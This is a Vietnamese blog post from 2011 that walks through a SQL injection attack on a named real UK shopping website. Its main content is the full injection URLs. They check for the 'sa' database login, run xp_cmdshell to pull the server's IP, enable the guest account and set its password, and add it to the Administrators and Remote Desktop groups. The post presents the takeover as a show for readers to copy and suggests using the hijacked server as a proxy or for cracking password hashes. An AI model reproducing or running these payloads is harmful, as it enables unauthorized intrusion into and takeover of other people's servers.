Remote desktop via user “sa”-sql injection

September 15, 2011 at 3:13 am Leave a comment

Thấy nhiều người hỏi cái này, mạn phép làm cái live show luôn ha Link bug: Code: http://www.funds4me.co.uk/stores.asp?catID=43′ +Check user: Code: http://www.funds4me.co.uk/stores.asp?catID=43’%20and%201=convert(int,system_user)–sp_password Dính SA goài:68: Trích: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘sa’ to a column of data type int. +Check ip srv: Đầu tiên đổ kết quả của lệnh ipconfig vào table keke: Code: http://www.funds4me.co.uk/stores.asp?catID=43′;drop%20table%20keke%20create%20table%20keke%20(id%20int%20identity,nd%20varchar(1000))%20insert%20into%20keke(nd)%20exec%20master..xp_cmdshell%20’ipconfig’–sp_password Sau đó convert ra xem kq thoai: Code: http://www.funds4me.co.uk/stores.asp?catID=43’%20and%201=convert(int,(select%20top%201%20nd%20from%20keke%20where%20nd%20like%20(‘%25Ip%20address%25’)))–sp_password Ra ip thật nè: Trích: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘ IP Address. . . . . . . . . . . . : 212.69.230.65 ‘ to a column of data type int. +Add user và nâng quyền rồi tìm cách remote desktop vào: Ở đây tôi chọn giải pháp active acc guest và nâng guest lên admin cho đỡ bị lộ Active guest acc: Code: http://www.funds4me.co.uk/stores.asp?catID=43’;exec master..xp_cmdshell ‘net user guest /active:yes’;–sp_password Set lại pass cho guest Code: http://www.funds4me.co.uk/stores.asp?catID=43′;exec master..xp_cmdshell ‘net user guest xxxxxx’;–sp_password Add guest vào admin group: Code: http://www.funds4me.co.uk/stores.asp?catID=43′;exec master..xp_cmdshell ‘net localgroup administrators guest /add’;–sp_password Chắc nữa là add guest vào Remote Desktop group: Code: http://www.funds4me.co.uk/stores.asp?catID=43′;exec master..xp_cmdshell ‘net localgroup “Remote Desktop Users” guest /add’;–sp_password Dùng Remote Desktop vào srv 212.69.230.65 với acc guest/xxxxxx thôi (pass đã change, ai thik thì tự tạo lại) P/S:cái này mà tạo Virtual Private Srv fake ip rất good, hoặc để crack md5 pass hash Thân!

Entry filed under: sql injection. Tags: .

Cách tạo và sử dụng file Robots.txt Cac thanh phan co ban cua android

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed



%d bloggers like this: